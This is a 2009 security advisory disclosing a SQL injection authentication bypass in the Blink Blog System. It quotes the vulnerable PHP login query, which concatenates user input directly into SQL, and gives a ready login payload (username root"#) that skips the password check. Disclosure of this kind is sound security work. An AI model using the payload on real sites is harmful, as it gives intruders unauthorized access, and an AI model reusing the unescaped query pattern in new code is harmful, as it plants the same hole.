Blink Blog SQL Injection

`******** Salvatore "drosophila" Fresta ********  
  
[+] Application: Blink Blog System  
[+] Version: Unknown  
[+] Website: http://blogink.sourceforge.net  
  
[+] Bugs: [A] Authentication Bypass  
  
[+] Exploitation: Remote  
[+] Date: 03 Aug 2009  
  
[+] Discovered by: Salvatore Fresta aka drosophila  
[+] Author: Salvatore Fresta aka drosophila  
[+] E-mail: drosophilaxxx [at] gmail.com  
  
  
***************************************************  
  
[+] Menu  
  
1) Bugs  
2) Code  
3) Fix  
  
  
***************************************************  
  
[+] Bugs  
  
There are many SQL Injection flaws but I post the  
only one that allows a guest to bypass the login.  
  
- [A] Authentication Bypass  
  
[-] Risk: medium  
[-] Requisites: magic_quotes_gpc = off  
[-] File affected: login.php, db.php  
  
This bug allows a guest to bypass the login.  
  
login.php:  
  
...  
  
$username = $_POST["nick"];  
$password = md5($_POST["password"]);  
if ($data = $DB->usercheck($username, $password))  
  
...  
  
db.php:  
  
function usercheck($username, $password)  
{  
$try = mysql_query("SELECT * FROM users WHERE nick=\"".$username."\" AND password=\"".$password."\" ");  
  
...  
  
  
***************************************************  
  
[+] Code  
  
  
- [A] Authentication Bypass  
  
username: root"#  
password: foo  
  
  
***************************************************  
  
[+] Fix  
  
No fix.  
  
  
***************************************************  
`